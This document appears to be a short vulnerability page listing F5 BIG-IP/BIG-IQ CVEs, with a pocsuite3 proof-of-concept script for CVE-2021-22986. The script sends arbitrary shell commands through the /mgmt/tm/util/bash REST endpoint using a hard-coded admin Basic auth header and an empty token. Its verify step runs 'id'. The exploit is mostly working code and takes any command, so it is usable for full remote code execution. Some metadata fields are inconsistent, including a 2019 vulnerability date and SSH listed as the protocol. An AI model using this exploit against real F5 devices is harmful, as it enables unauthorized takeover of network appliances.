F5 Networks 多个漏洞（CVE-2021-22986、CVE-2021-22987、CVE-2021-22988、CVE-2021-22989、CVE-2021-22990、CVE-2021-22991、CVE-2021-22992）

# !/usr/bin/env python # coding: utf-8 import json from pocsuite3.api import POCBase, Output, register_poc, logger, POC_CATEGORY, requests, \ get_listener_port, get_listener_ip class DemoPOC(POCBase): vulID = '99156' version = '1.0' author = ['kuipla'] vulDate = '2019-03-12' createDate = '2021-03-13' updateDate = '2021-03-13' references = ['https://www.seebug.org/vuldb/ssvid-99156'] name = 'F5 BigIP 未授权RCE漏洞（CVE-2021-22986）' appPowerLink = '' appName = '' # appVersion = '' appVersion = '16.0.0 < BIG-IP version < 16.0.1、15.1.0 < BIG-IP version < 15.1.2、14.1.0 < BIG-IP version < 14.1.3.1、13.1.0< BIG-IP version < 13.1.3.5、12.1.0< BIG-IP version < 12.1.5.2、7.1.0< BIG-IQ version < 7.1.0.2、7.0.0< BIG-IQ version < 7.0.0.1、6.0.0< BIG-IQ version < 6.1.0' vulType = 'RCE' desc = '''''' samples = [''] install_requires = [''] category = POC_CATEGORY.TOOLS.CRACK protocol = POC_CATEGORY.PROTOCOL.SSH def exploit(self, cmd): result = {} url = self.url headers = { "Content-Type": "application/json", "Authorization": "Basic YWRtaW46YWRtaW4=", "X-F5-Auth-Token": "" } data = { "command": "run", "utilCmdArgs": "-c '%s'" % cmd } r = requests.post(url + "/mgmt/tm/util/bash", data=json.dumps(data), headers=headers, timeout=10) if "uid" in r.text and "gid" in r.text: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = url return result def _verify(self): result = {} cmd = "id" try: result = self.exploit(cmd) except Exception as e: logger.error(e) return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('Internet nothing returned') return output register_poc(DemoPOC)